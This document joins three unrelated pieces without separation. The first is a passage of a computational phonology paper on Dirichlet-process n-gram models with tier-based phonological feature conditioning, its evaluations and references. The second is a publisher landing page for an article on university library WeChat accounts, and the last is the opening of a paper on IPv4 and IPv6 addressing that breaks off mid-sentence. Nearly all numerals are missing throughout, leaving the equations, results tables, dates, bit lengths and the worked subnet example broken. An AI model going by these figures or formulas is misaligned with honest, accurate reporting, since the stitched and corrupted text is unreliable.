n-gram models with dp-backoff let t be a set of discrete objects (e.g., atomic sym- bols or structured segments as defined in the preced- ing sections). let t∗ be the set of all finite-length strings which can be generated by combining ele- ments of t , under concatenation, ·, including the empty string �. a context, u is any finite string be- ginning with a special distinguished start sym- bol and ending with some sequence in t∗, that is, u ∈{start ·t∗}. for any string α, define hd(α) to be the function that returns the first symbol in the string, tl(α) to be the function that returns suffix of α minus the first symbol, and |α| to be the length of α, with hd(�) = tl(�) = � and |�| = . write the concatenation of two strings α and α′ as α ·α′. let hu be a distribution on next symbols—that is, objects in t ∪{stop}—conditioned on a given context u. for an n-gram model of order n, the probability of a string β in t∗ is given by knstart(β · stop), where knu (α) is defined as: knu (α) = { α = � hfn(u) (hd(α)) ×kn u·hd(α)(tl(α)) otherwise , ( ) where fn(·) is a context-management function which determines which parts of the left-context should be used to determine the probability of the current symbol. in the case of the n-gram models used in this paper, fn(·) takes a sequence u and re- turns only the rightmost n − elements from the sequence, or the entire sequence if it has length less than n. note two aspects of this formulation of n-gram models. first, hu is a family of distributions over next symbols or more general objects. later, we will drop in phonological-feature-based generative pro- cesses for these distributions. second, the function fn is a parameter of the above definitions. in what follows, we will use a variant of this function which is sensitive to tier-based structure, returning the pre- vious n− only on the appropriate tier. mackay and peto ( ) introduced a hierarchi- cal dirichlet process-based backoff scheme for n- gram models, with generalizations in teh ( ) and goldwater et al. ( ). in this setup, the distribu- tion over next symbols given a context u is drawn hierarchically from a dirichlet process whose base measure is another dirichlet process associated with context tl(u), and so on, with all draws ultimately backing off into some unconditioned distribution over all possible next symbols. that is, in a hier- archical dirichlet process n-gram model, hfn(u) is given as follows. hfn(u) ∼ { dp(θfn(u),hfn− (u)) n ≥ dp(θfn(u), uniform(t ∪{stop})) n = . tier-based interactions to make the n-gram model defined in the last sec- tion capture tier-based interactions, we make two changes. first, we generalize the generative pro- cess hs from equation to hsu, which generates subsegments conditional on a sequence u. sec- ond, we define a context-truncating function fsn(u) which takes a context of segments u and returns the rightmost n− non-empty subsegments whose root node is s. then we substitute the generative pro- cess hs fsn(u) (which applies the context-management function fsn(·) to the context u) for hfn(u) in equa- tion . the resulting probability distribution is: knu (α) = { α = � hr fr n (u) (hd(α)) ×kn u·hd(α)(tl(α)) otherwise . knu (α) is the distribution over continuations given a context of segments. its definition depends on hs fsn(u) , which is the generalization of the gener- ative process for segments hs to be conditional on some tier-based n-gram context fsn(u). h s fsn(u) is: hsfsn(u) ∼ { dp(θs fsn(u) ,hs fs n− (u) ) n ≥ dp(θs fsn(u) ,gs fs n (u) ) n = gsfsn(u) (ps) = { ∏ s′∈ch(s) h s′ fs ′ n (u) (ps ′ ) t(s) = and ∑ s′∈ch(s) ψ s s′h s′ fs ′ n (u) (ps ′ ) t(s) = or. hs fsn(u) and gs fsn(u) above are mutually recursive functions. hs fsn(u) implements backoff in the tier- based context of previous subsegments; gs fsn(u) im- plements backoff by going down into the probabil- ity distributions defined by the feature dependency graph. note that the function hs fsn(u) recursively backs off to the empty context, but its ultimate base distri- bution is indexed by fsn(u), using the global maxi- mum n-gram order n. so when samples are drawn from the feature dependency graph, they are con- ditioned on non-empty tier-based contexts. in this way, subsegments are generated based on tier-based context and based on featural backoff in an inter- leaved fashion. . inference we use the chinese restaurant process represen- tation for sampling. inference in the model is over seating arrangements for observations of sub- segments and over the hyperparameters θ for each restaurant. we perform gibbs sampling on seating arrangements in the dirichlet n-gram models by re- moving and re-adding observations in each restau- rant. these gibbs sweeps had negligible impact on model behavior. for the concentration parame- ter θ, we set a prior gamma( , . ). we draw pos- terior samples using the slice sampler described in johnson and goldwater ( ). we draw one pos- terior sample of the hyperparameters for each gibbs sweep. in contrast to the gibbs sweeps, we found re- sampling hyperparameters to be crucial for achiev- ing the performance described below (section . ). related work phonotactics has proven a fruitful problem domain for computational models. most such work has adopted a constraint-based approach, attempting to design a scoring function based on phonological fea- tures to separate acceptable forms from unaccept- able ones, typically by formulating restrictions or constraints to rule out less-good structures. this concept has led naturally to the use of undi- rected (maximum-entropy, log-linear) models. in this class of models, a form is scored by evaluation against a number of predicates, called factors —for example, whether two adjacent segments have the phonological features voice:+ voice:-. each fac- tor is associated with a weight, and the score for a form is the sum of the weights of the factors which are true for the form. the well-known model of factors are also commonly called “features”—a term we avoid to prevent confusion with phonological features. hayes and wilson ( ) adopts this framework, pairing it with a heuristic procedure for finding ex- planatory factors while preventing overfitting. simi- larly, albright ( ) assigns a score to forms based on factors defined over natural classes of adjacent segments. constraint-based models have the advan- tage of flexibility: it is possible to score forms using arbitrarily complex and overlapping sets of factors. for example, one can state a constraint against ad- jacent phonemes having features voice:+ and lat- eral:+, or any combination of feature values. in contrast, we have presented a model where forms are built out of parts by structure-building op- erations. from this perspective, the goal of a model is not to rule out bad forms, but rather to discover repeating structures in good forms, such that new forms with those structures can be generated. in this setting there is less flexibility in how phonological features can affect well-formedness. for a structure-building model to assign “scores” to arbitrary pairs of co-occurring features, there must be a point in the generative process where those fea- tures are considered in isolation. coming up with such a process has been challenging. as a result of this limitation, structure-building models of phono- tactics have not generally included rich featural in- teractions. for example, coleman and pierrehum- bert ( ) give a probabilistic model for phonotac- tics where words are generated using grammar over units such as syllables, onsets, and rhymes. this model does not incorporate fine-grained phonolog- ical features such as voicing and place. in fact, it has been argued that a constraint- based approach is required in order to capture rich feature-based interactions. for example, goldsmith and riggle ( ) develop a tier-based structure- building model of finnish phonotactics which cap- tures nonlocal vowel harmony interactions, but ar- gue that this model is inadequate because it does not assign higher probabilities to forms than an n- gram model, a common baseline model for phono- tactics (daland et al., ). they argue that this deficiency is because the model cannot simulta- neously model nonlocal vowel-vowel interactions and local consonant-vowel interactions. because of our tier-based conditioning mechanism (sections . and . ), our model can simultaneously produce lo- cal and nonlocal interactions between features us- ing structure-building operations, and does assign higher probabilities to held-out forms than an n- gram model (section . ). from this perspective, our model can be seen as a proof of concept that it is possible to have rich feature-based conditioning without adopting a constraint-based approach. while our model can capture featural interactions, it is less flexible than a constraint-based model in that the allowable interactions are specified by the feature dependency graph. for example, there is no way to encode a direct constraint against adja- cent phonemes having features voice:+ and lat- eral:+. we consider this a strength of the ap- proach: a particular feature dependency graph is a parameter of our model, and a specific scientific hypothesis about the space of likely featural interac- tions between phonemes, similar to feature geome- tries from classical generative phonology (clements, ; mccarthy, ; halle, ). while probabilistic approaches have mostly taken a constraint-based approach, recent formal language theoretic approaches to phonology have investigated what basic parts and structure building operations are needed to capture realistic feature-based interac- tions (heinz et al., ; jardine and heinz, ). we see probabilistic structure-building approaches such as this work as a way to unify the recent for- mal language theoretic advances in computational phonology with computational phonotactic model- ing. our model joins other nlp work attempting to do sequence generation where each symbol is gen- erated based on a rich featural representation of previous symbols (bilmes and kirchhoff, ; duh and kirchhoff, ), though we focus more on phonology-specific representations. our and-or graphs are similar to those used in computer vision to represent possible objects (jin and geman, ). model evaluation and experiments here we evaluate some of the design decisions of our model and compare it to a baseline n-gram model and to a widely-used constraint-based model, blick. in order to probe model behavior, we also we do however note that it may be possible to learn feature hierarchies on a language-by-language basis from universal ar- ticulatory and acoustic biases, as suggested by dresher ( ). present evaluations on artificial data, and a sampling of “representative forms” preferred by one model as compared to another. our model consists of structure-building opera- tions over a learned inventory of subsegments. if our model can exploit more repeated structure in phono- logical forms than the n-gram model or constraint- based models, then it should assign higher probabil- ities to forms. the log probability of a form under a model corresponds to the description length of that form under the model; if a model assigns a higher log probability to a form, that means the model is ca- pable of compressing the form more than other mod- els. therefore, we compare models on their ability to assign high probabilities to phonological forms, as in goldsmith and riggle ( ). . evaluation of model components we are interested in discovering the extent to which each model component described above— feature dependency graphs (section . ), class node struc- ture (section . ), and tier-based conditioning (sec- tion . )— contributes to the ability of the model to explain wordforms. to evaluate the contribution of feature depen- dency graphs, we compare our models with a base- line n-gram model, which represents phonemes as atomic units. for this n-gram model, we use a hier- archical dirichlet process with n = . to evaluate feature dependency graphs with and without articulated class node structure, we com- pare models using the graph shown in figure (the minimal structure required to produce well- formed phonemes) to models with the graph shown in figure , which includes phonologically moti- vated “class nodes”. to evaluate tier-based conditioning, we compare models with the conditioning described in sec- tions . and . to models where all decisions are conditioned on the full featural specification of the previous n− phonemes. this allows us to isolate improvements due to tier-based conditioning beyond improvements from the feature hierarchy. these feature dependency graphs differ from those in the exposition in section in that they do not include a manner feature; but rather treat vowel as a possible value of manner. duration laryngeal nasal manner suprasegmental backness height rounding c place nd art. lateral otherwisevowel figure : feature dependency graph with class node structure used in our experiments. plain text nodes are or-nodes with no child distributions. the arc marked otherwise represents several arcs, each labelled with a consonant manner such as stop, fricative, etc. duration laryngeal nasal manner suprasegmental backness height rounding c place nd art. lateral otherwisevowel figure : “flat” feature dependency graph. . lexicon data the wolex corpus provides transcriptions for words in dictionaries of diverse languages, rep- resented in terms of phonological features (graff, ). in addition to words, the dictionaries in- clude some short set phrases, such as of course. we use the featural representation of wolex, and de- sign our feature dependency graphs to generate only well-formed phonemes according to this feature sys- tem. for space reasons, we present the evaluation of our model on of these languages, chosen based on the quality of their transcribed lexicons, and the authors’ knowledge of their phonological systems. . held-out evaluation here we test whether the different model configu- rations described above assign high probability to held-out forms. this tests the models’ ability to generalize beyond their training data. we train each model on randomly selected wordforms from a wolex dictionary, and compute posterior predic- tive probabilities for the remaining wordforms from the final state of the model. language ngram flat cl. node flat/no tiers cl.node/no tiers english - . - . - . ∗∗ - . - . french - . - . - . ∗∗ - . - . georgian - . - . - . ∗ - . - . german - . - . - . ∗∗ - . - . greek - . - . - . ∗∗ - . - . haitian creole - . - . - . ∗∗ - . - . lithuanian - . - . - . ∗ - . - . mandarin - . - . ∗ - . ∗∗ - . ∗ - . ∗ mor. arabic - . - . - . ∗ - . - . polish - . - . - . ∗∗ - . - . quechua - . - . - . ∗ - . - . romanian - . - . - . ∗∗ - . - . tatar - . - . - . ∗∗ - . - . turkish - . - . - . ∗∗ - . - . table : average log posterior predictive probability of a held-out form. “ngram” is the dp backoff -gram model. “flat” models use the feature dependency graph in fig- ure . “cl. node” models use the graph in figure . see text for motivations of these graphs. “no tiers” models condition each decision on the previous phoneme, rather than on tiers of previous features. asterisks indicate sta- tistical significance according to a t-test comparing with the scores under the n-gram model. * = p < . ; ** = p < . . table shows the average probability of a held- out word under our models and under the n-gram model for one model run. for all languages, we get a statistically significant increase in probabili- ties by adopting the autosegmental model with class nodes and tier-based conditioning. model variants without either component do not significantly out- perform the n-gram model except in chinese. the combination of class nodes and tier-based condition- ing results in model improvements beyond the con- tributions of the individual features. . evaluation on artificial data our model outperforms the n-gram model in pre- dicting held-out forms, but it remains to be shown that this performance is due to capturing the kinds of linguistic intuitions discussed in section . an alternative possibility is that the autosegmental n- gram model, which has many more parameters than a plain n-gram model, can simply learn a more ac- curate model of any sequence, even if that sequence has none of the structure discussed above. to evalu- ate this possibility, we compare the performance of our model in predicting held-out linguistic forms to its performance in predicting held-out forms from artificial lexicons which expressly do not have the the mean standard deviation per form of log probabilities over runs of the full model ranged from . for amharic to . for dutch. linguistic structure we are interested in. if the autosegmental model outperforms the n- gram model even on artificial data with no phono- logical structure, then its performance on the real linguistic data in section . might be overfitting. on the other hand, if the autosegmental model does better on real data but not artificial data, then we can conclude that it is picking up on some real distinc- tive structure of that data. for each real lexicon lr, we generate an artificial lexicon la by training a dp -gram model on lr and forward-sampling |lr| forms. additionally, the forms in la are constrained to have the same distri- bution over lengths as the forms in lr. the resulting lexicons have no tier-based or featural interactions except as they appear by chance from the n-gram model trained on these lexica. for each la we then train our models on the first forms and score the probabilities of the held-out forms, the same pro- cedure as in section . . we ran this procedure for all the lexicons shown in table . for all but one lexicon, we find that the autosegmental models do not significantly outper- form the n-gram models on artificial data. the ex- ception is mandarin chinese, where the average log probability of an artificial form is − . under the n-gram model and − . under the full autoseg- mental model. the result suggests that the anoma- lous behavior of mandarin chinese in section . may be due to overfitting. when exposed to data that explicitly does not have autosegmental structure, the model is not more accurate than a plain sequence model for almost all languages. but when exposed to real linguistic data, the model is more accurate. this result provides ev- idence that the generative model developed in sec- tion captures true distributional properties of lexi- cons that are absent in n-gram distributions, such as featural and tier-based interactions. . comparison with a constraint-based model here we provide a comparison with hayes and wilson ( )’s phonotactic learner, which out- puts a phonotactic grammar in the form of a set of weighted constraints on feature co-occurrences. this grammar is optimized to match the constraint violation profile in a training lexicon, and so can be seen as a probabilistic model of that lexicon. the authors have distributed one such grammar, blick, as a “reference point for phonotactic probability in experimentation” (hayes, ). here we compare our model against blick on its ability to assign probabilities to forms, as in section . . ideally, we would simply compute the probabil- ity of forms like we did in our earlier model com- parisons. blick returns scores for each form. however, since the probabilistic model underlying blick is undirected, these scores are in fact unnor- malized log probabilities, so they cannot be com- pared directly to the normalized probabilities as- signed by the other models. furthermore, because the probabilistic model underlying blick does not penalize forms for length, the normalizing constant over all forms is in fact infinite, making straightfor- ward comparison of predictive probabilities impos- sible. nevertheless, we can turn blick scores into probabilities by conditioning on further constraints, such as the length k of the form. we enumerate all possible forms of length k to compute the normal- izing constant for the distribution over forms of that length. the same procedure can also be used to com- pute the probabilities of each form, conditioned on the length of the form k, under the n-gram and au- tosegmental models. to compare our models against blick, we cal- culate conditional probabilities for forms of length through from the english lexicon. the forms are those in the wolex corpus; we include them for this evaluation if they are k symbols long in the wolex representation. for our n-gram and au- tosegmental models, we use the same models as in section . . the average probabilities of forms un- der the three models are shown in table . for length - , the autosegmental model assigns the highest probabilities, followed by the n-gram model and blick. for length , blick outperforms the dp n-gram model but not the autosegmental model. our model assigns higher probabilities to short forms than blick. that is, our models have iden- tified more redundant structure in the forms than blick, allowing them to compress the data more. however, the comparison is imperfect in several enumerating and scoring the , , , possible forms of length was computationally impractical. length blick ngram cl. node - . - . - . - . - . - . - . - . - . - . - . - . table : average log posterior predictive probability of an english form of fixed length under blick and our models. english n-gram english full model collaborationist mistrustful a posteriori inharmoniousness sacristy absentmindedness matter of course blamelessness earnest money phlegmatically table : most representative forms for the n-gram model and for our full model (“cl. node” in table ) in en- glish. forms are presented in native orthography, but were scored based on their phonetic form. ways. first, blick and our models were trained on different data; it is possible that our training data are more representative of our test data than blick’s training data were. second, blick uses a different underlying featural decomposition than our models; it is possible that our feature system is more ac- curate. nevertheless, these results show that our model concentrates more probability mass on (short) forms attested in a language, whereas blick likely spreads its probability mass more evenly over the space of all possible (short) strings. . representative forms in order to get a sense of the differences between models, we investigate what phonological forms are preferred by different kinds of models. these forms might be informative about the phonotactic patterns that our model is capturing which are not well- represented in simpler models. we calculate the rep- resentativeness of a form f with respect to model m as opposed to m as p(f|m )/p(f|m ) (good, ; tenenbaum and griffiths, ). the forms that are most “representative” of model m are not the forms that m assigns the highest probability, but rather the forms that m ranks highest relative to m . tables and show forms from the lexicon that are most representative of our full model and of the n-gram model for english and turkish. the most turkish n-gram turkish full model üstfamilya büyükkarapınar dekstrin kızılcapınar mnemotekni altınpınar ekskavatör sarımehmetler foksterye karaelliler table : most representative forms for n-gram and au- tosegmental models in turkish. uniquely representative forms for our full model are morphologically complex forms consisting of many productive, frequently reused morphemes such as ness. on the other hand, the representative forms for the n-gram model include foreign forms such as a posteriori (for english) and ekskavatör (for turk- ish), which are not built out of parts that frequently repeat in those languages. the representative forms suggest that the full model places more probability mass on words which are built out of highly produc- tive, phonotactically well-formed parts. discussion we find that our models succeed in assigning high probabilities to unseen forms, that they do so specifi- cally for linguistic forms and not random sequences, that they tend to favor forms with many productive parts, and that they perform comparably to a state- of-the-art constraint-based model in assigning prob- abilities to short forms. the improvement for our models over the n-gram baseline is consistent but not large. we attribute this to the way in which phonological generaliza- tions are used in the present model: in particular, phonological generalizations function primarily as a form of backoff for a sequence model. our mod- els have lexical memoization at each node in a fea- ture dependency graph; as such, the top node in the graph ends up representing transition probabil- ities for whole phonemes conditioned on previous phonemes, and the rest of the feature dependency graph functions as a backoff distribution. when a model has been exposed to many training forms, its behavior will be largely dominated by the n-gram- like behavior of the top node. in future work it might be effective to learn an optimal backoff procedure which gives more influence to the base distribution (duh and kirchhoff, ; wood and teh, ). while the tier-based conditioning in our model would seem to be capable of modeling nonlocal interactions such as vowel harmony, we have not found that the models do well at reproducing these nonlocal interactions. we believe this is because the model’s behavior is dominated by nodes high in the feature dependency graph. in any case, a simple markov model defined over tiers, as we have pre- sented here, might not be enough to fully model vowel harmony. rather, a model of phonological processes, transducing underlying forms to surface forms, seems like a more natural way to capture these phenomena. we stress that this model is not tied to a particular feature dependency graph. in fact, we believe our model provides a novel way of testing different hy- potheses about feature structures, and could form the basis for learning the optimal feature hierarchy for a given data set. the choice of feature dependency graph has a large effect on what featural interactions the model can represent directly. for example, nei- ther feature dependency graph has shared place fea- tures for consonants and vowels, so the model has limited ability to represent place-based restrictions on consonant-vowel sequences such as requirements for labialized or palatalized consonants in the con- text of /u/ or /i/. these interactions can be treated in our framework if vowels and consonants share place features, as in padgett ( ). conclusion we have presented a probabilistic generative model for sequences of phonemes defined in terms of phonological features, based on representational ideas from generative phonology and tools from bayesian nonparametric modeling. we consider our model as a proof of concept that probabilistic structure-building models can include rich featural interactions. our model robustly outperforms an n- gram model on simple metrics, and learns to gener- ate forms consisting of highly productive parts. we also view this work as a test of the scientific hy- potheses that phonological features can be organized in a hierarchy and that they interact along tiers: in our model evaluation, we found that both concepts were necessary to get an improvement over a base- line n-gram model. acknowledgments we would like to thank tal linzen, leon bergen, edward flemming, edward gibson, bob berwick, jim glass, and the audiences at mit’s phonology circle, sigmorphon, and the lsa annual meeting for helpful comments. this work was sup- ported in part by nsf ddrig grant # to r.f. references adam albright. . feature-based generalization as a source of gradient acceptability. phonology, : – . robert c. berwick. . the acquisition of syntactic knowledge. mit press, cambridge, ma. jeff a. bilmes and katrin kirchhoff. . fac- tored language models and generalized parallel back- off. in proceedings of the conference of the north american chapter of the association for com- putational linguistics on human language technol- ogy: companion volume of the proceedings of hlt- naacl –short papers–volume , pages – . as- sociation for computational linguistics. geert booij. . morpheme structure constraints. in the blackwell companion to phonology. blackwell. noam chomsky and morris halle. . some contro- versial questions in phonological theory. journal of linguistics, : – . noam chomsky and morris halle. . the sound pattern of english. harper & row, new york, ny. george n. clements and elizabeth v. hume. . the internal organization of speech sounds. in the hand- book of phonological theory, pages – . black- well, oxford. george n. clements. . the geometry of phonologi- cal features. phonology yearbook, : – . john coleman and janet b. pierrehumbert. . stochastic phonological grammars and acceptability. in john coleman, editor, proceedings of the rd meet- ing of the acl special interest group in computa- tional phonology, pages – , somserset, nj. asso- ciation for computational linguistics. robert daland, bruce hayes, james white, marc garellek, andreas davis, and ingrid normann. . explaining sonority projection effects. phonology, : – . carl de marcken. . linguistic structure as com- position and perturbation. in proceedings of the th annual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. b. elan dresher. . the contrastive hierarchy in phonology. cambridge university press. kevin duh and katrin kirchhoff. . automatic learning of language model structure. in proceedings of coling , geneva, switzerland. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. annals of statistics, ( ): – . john goldsmith and jason riggle. . information theoretic approaches to phonology: the case of finnish vowel harmony. natural langauge and linguistic the- ory, ( ): – . sharon goldwater, thomas l. griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in advances in neu- ral information processing systems, volume , pages – , cambridge, ma. mit press. sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. irving john good. . the estimation of probabili- ties. mit press, cambridge, ma. noah d. goodman, vikash k. mansinghka, daniel roy, keith bonawitz, and joshua b. tenenbaum. . church: a language for generative models. in un- certainty in artificial intelligence, helsinki, finland. auai press. peter graff. . communicative efficiency in the lexi- con. ph.d. thesis, massachusetts institute of technol- ogy. morris halle. . the sound pattern of russian: a linguistic and acoustical investigation. mouton, the hague, the netherlands. morris halle. . feature geometry and feature spreading. linguistic inquiry, ( ): – . bruce hayes and colin wilson. . a maximum en- tropy model of phonotactics and phonotactic learning. linguistic inquiry, ( ): – . bruce hayes. . blick - a phonotactic probability calculator. jeffrey heinz, chetan rawal, and herbert g. tanner. . tier-based strictly local constraints for phonol- ogy. in the th annual meeting of the association for computational linguistics. roman jakobson, c. gunnar m. fant, and morris halle. . preliminaries to speech analysis: the distinc- tive features and their correlates. the mit press, cambridge, massachusetts and london, england. adam jardine and jeffrey heinz. . a concatenation operation to derive autosegmental graphs. in proceed- ings of the th meeting on the mathematics of lan- guage (mol ), pages – , chicago, usa, july. ya jin and stuart geman. . context and hierar- chy in a probabilistic image model. in proceedings of the ieee computer society conference on computer vision and pattern recognition (cvrp’ ), pages – . mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in naacl-hlt , pages – . associa- tion for computational linguistics. mark johnson, thomas l griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. in advances in neural information processing sys- tems, pages – . mary-louise kean. . the theory of markedness in generative grammar. ph.d. thesis, massachusetts institute of technology. david j.c. mackay and linda c. bauman peto. . a hierarchical dirichlet language model. natural lan- guage engineering, : – . john mccarthy. . feature geometry and depen- dency: a review. phonetica, : – . donald michie. . “memo” functions and machine learning. nature, : – . timothy j. o’donnell. . productivity and reuse in language: a theory of linguistic computation and storage. the mit press, cambridge, massachusetts and london, england. jaye padgett. . consonant-vowel place feature in- teractions. in the blackwell companion to phonol- ogy, pages – . blackwell publishing, malden, ma. ezer rasin and roni katzir. . a learnability argu- ment for constraints on underlying representations. in proceedings of the th annual meeting of the north east linguistic society (nels ), cambridge, mas- sachusetts. jayaram sethuraman. . a constructive definition of dirichlet priors. statistica sinica, pages – . richard stanley. . redundancy rules in phonology. language, ( ): – . yee whye teh. . a bayesian interpretation of in- terpolated kneser-ney. technical report tra / , school of computing, national university of singa- pore. joshua b tenenbaum and thomas l griffiths. . the rational basis of representativeness. in proceedings of the rd annual conference of the cognitive science society, pages – . nikolai s. trubetzkoy. . grundzüge der phonolo- gie. number in travaux du cercle linguistique de prague. vandenhoeck & ruprecht, göttingen. frank wood and yee whye teh. . a hierarchi- cal nonparametric bayesian approach to statistical lan- guage model domain adaptation. in artificial intelli- gence and statistics, pages – . frank wood, cédric archambeau, jan gasthaus, james lancelot, and yee whye teh. . a stochastic memoizer for sequence data. in proceedings of the th international conference on machine learning, montreal, canada. university library internet wechat public account applicated for student values education | atlantis press proceedings journals books series:advances in computer science research proceedings of the second international conference of sensor network and computer engineering (icsnce ) home preface articles authors sessions organizers publishing information <previous article in volume next article in volume> university library internet wechat public account applicated for student values education authors zhao yan corresponding author zhao yan available online april . doi https://doi.org/ . /icsnce- . . how to use a doi? keywords university library; wechat public account; values education abstract with the popularization of intelligent mobile phones, mobile phones instant messaging application has achieved rapid development, at the same time, along with the sns (social network service) development, combined with mobile phones instant messaging and sns has become an important means of the current internet environment for people to communicate, in this trend, the university library is constantly looking for every kind of platform the expansion of information service. wechat is a public platform for multimedia service platform tencent inc launched in the wechat foundation, since august officially launched, quickly applied to restaurants, hotels, banks and other industries, and achieved good development, university library also actively use wechat public platform, a new method to create the information service. in september , , beihang university opened a wechat public platform, the first university library and university library, china also launched wechat service platform, designed for teachers and students to provide more convenient and fast, and various information services, among them, china" " universities, public service platform of wechat has colleges and universities the library opened the official certification, the " " university libraries provide public service platform of wechat earlier, in the function of the platform construction experience is relatively rich, ahead of other colleges and universities in china. investigation and analysis of the public use of the wechat, and on the construction of college students, some university libraries in xi'an city to carry out the use of wechat, the public number, in order to understand the xi'an city university library with the wechat platform opened the public service teaching situation through research, especially the university library using the wechat public number of value education, to some experience through investigation of university library in this aspect, also hope to find some problems, and put forward the countermeasures of university library with the educational values of college students network of new media services. open access this is an open access article distributed under the cc by-nc license. download article (pdf) <previous article in volume next article in volume> proceedings second international conference of sensor network and computer engineering (icsnce ) part of series advances in computer science research publication date april isbn - - - - issn - x doi https://doi.org/ . /icsnce- . . how to use a doi? open access this is an open access article distributed under the cc by-nc license. cite this article risenwbib ty - conf au - zhao yan py - / da - / ti - university library internet wechat public account applicated for student values education bt - second international conference of sensor network and computer engineering (icsnce ) pb - atlantis press sp - ep - sn - - x ur - https://doi.org/ . /icsnce- . . do - https://doi.org/ . /icsnce- . . id - yan / er - download .riscopy to clipboard atlantis press atlantis press is a professional publisher of scientific, technical and medical (stm) proceedings, journals and books. we offer world-class services, fast turnaround times and personalised communication. the proceedings and journals on our platform are open access and generate millions of downloads every month. for more information, please contact us at: contact@atlantis-press.com proceedingsjournalsbookspublishing services aboutnewscontactsearch copyright © - atlantis press homeprivacy policyterms of use international journal of advanced network, monitoring and controls volume , no. , research on ipv , ipv and ipv address representation yury halavachou department of the international relations belarusian state university of transport republic of belarus , kirova street, gomel, republic of belarus e-mail: oms@bsut.by wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—the new generation network architecture (ipv ) is designed to solve a series of problems such as the shortage of address space and the danger of information security. ipv addresses have a length of bits and a theoretically expressible address space of , while ipv addresses extend to bits and theoretically an address space of . in this paper, by studying ipv , ipv address structure focuses on the new generation of network ipv address representation method. this method adopts the address coding method of the variable-length and variable-position, ranging from bits to bits. moreover, it adopts the mechanism of verification before communication, and relies on the method of assigning addresses to the computers on the internet with full character codes. it redefines the address structure of the future internet and provides new solutions for the internet of things and the internet of everything. keywords-ipv ; ipv ; ipv ; address structure i. network address an interconnected network is made up of lan with interconnected nodes, also known as hosts or routers. each device has a physical address connected to a network with a mac layer address and a logical internet address. because a network address can be logically assigned to any network device, it is also called a logical address. internet addresses are assigned by the internet corporation for assigned names and numbers. the association appoints three local organizations - internic, ripencc and apnic - to carry out location assignments in north america, europe and the asia pacific region. the purpose of this uniform allocation is to ensure that network addresses are globally unique. ii. address space for ipv the entire internet is a single and abstract network. an ip address is a worldwide unique -bit identifier assigned to each interface of every host (or router) on the internet. the structure of ip addresses makes it easy to address them on the internet. a. the base header of ipv the base first format design of ipv is shown in figure . doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , figure . ip datagram format figure shows. the first line of the above section indicates the bits occupied by each field in the header format. the whole header format is divided into fixed part ( bytes in total) and variable part. the variable part is to increase the function of ip datagram, but the variable header length of ip datagram also increases the overhead of each router to process datagram. the following explains the role of the fields in the base ipv header. ) version. ip version. ) header length (hl). it can represent a maximum decimal value of and the most commonly used header length of bytes (header length of ). ) differentiated services. it is used to get better service. ) total length. it refers to the length of the sum of the radical and the data. ) identification. it holds the value of the counter that accumulates the number of datagram. ) flag. it is a total of bits, the lowest bit (more fragment) means if there is still fragmentation, the middle bit (don't fragment) means if there is still fragmentation. ) fragment offset. it represents the relative position of a slice in the original grouping after the longer grouping is fragmented. ) time to live. it represents the lifetime of the datagram in the network. ) protocol. it indicates which protocol is used for the data carried by the datagram. ) head checksum. as the datagram passes through each router, the router calculates the sum again. b. classified ip addresses classification of ip address is the most base addressing method, the core of which is to divide the ip address into several fixed classes, each of which is composed of two fixed-length fields: network-id and host-id. the first field indicates the network to which the host or router is connected, and the network number must be unique. the second field identifies the host or router, and a host number must be unique within the range indicated by the network number it is on. thus, the uniqueness of an ip address is ensured. this two-level ip address can be recorded as: ip address: : ={< network number >, < host number >}, where ": : =" means "defined as". figure below shows the network number field and host number field of various ip addresses: international journal of advanced network, monitoring and controls volume , no. , figure . network number field and host number field in ip address figure shows: the network number field of address of class a, b and c (the field is pink in the figure) is , and word length respectively, while the category bit of - bits in the front of the network number field is specified as , and respectively. the host number fields of class a, b, and c addresses are , , and word long, respectively. class d addresses (the first four bits are ) are used for multicast (one-to-many communication). class e addresses (the first four bits are ) are reserved for later use. a dotted decimal notation is presented to improve the readability of ip addresses when it is -bit binary code. in ip addresses, every eight bits is represented in decimal, with a dot inserted between the digits. figure illustrates the convenience of this method. figure . illustrates the decimal system c. improvement of base addressing method because the classified ip address has defects, the ip address addressing method also goes through the following two historical stages. ) subnet partitioning subnet division mainly includes two contents, one is to make the ip address from two to three levels, improve the utilization of ip address space, improve international journal of advanced network, monitoring and controls volume , no. , network performance and enhance the flexibility of ip address; the second is the use of subnet mask, subnet mask and ip address bitwise "and" operation (and) to get the network address, so as to facilitate the datagram sent to the destination network. a) subnet idea  the subnet is still represented as a network.  borrow some bits from the host number of the network as the subnet number, and the two-level ip address becomes the three-level ip address within a certain range, which can be expressed as: ip address: : ={< network number >,< subnet number >,< host number >}  the ip datagram can be sent to the router according to the destination network number, and then the router can find the destination subnet according to the network number and subnet number, and deliver the ip datagram to the destination host. b) subnet mask a subnet mask, also known as a network mask or address mask, is a -bit address that consists of a string of one’s followed by a string of zeros. it is used to indicate which bits are the subnet and host that identify an ip address. the following example illustrates the role of subnet masks: [example] the known ip address is . . . , and the subnet mask is . . . .try to find the network address. [answer]the subnet mask is , because the first two bytes of the mask are all , so the first two bytes of the network address can be written as . .the fourth byte of the subnet mask is all , so the fourth byte of the network address is .it can be seen that this question only needs to calculate the third byte in the address, and we can easily obtain the network address by using binary representation of the third byte of ip address and subnet mask, as shown in figure below: figure . solving process of network address ) classless inter-domain routing (constitute super-netting) the main characteristics of classless inter-domain routing (cidr) are as follows: a) cidr eliminates the traditional concept of classified address and subnet division. cidr divides the ip address into a network-prefix and a host number, denoted by: ip address: : ={< network prefix >, < host number >} cidr also uses slash notation. it is to add "/" after the ip address, and write the number of network prefix after the slash, for example: international journal of advanced network, monitoring and controls volume , no. , . . . / = , , , b) cidr address block cidr combines the same network prefix with consecutive ip addresses to form a "cidr address block", which can be specified by the smallest address in the address block and the number of digits in the network prefix. for example: . . . / in the address block: the minimum address is . . . / = the maximum address is . . . / = so the above address can be recorded as . . . / , referred to as "/ address block" for short. the routing table can use a cidr address block containing multiple addresses to query the destination network. this aggregation of addresses is known as routing aggregation and is also known as composition supernettingting. iii. ipv address space ipv is the sixth version of the internet protocol. ipv 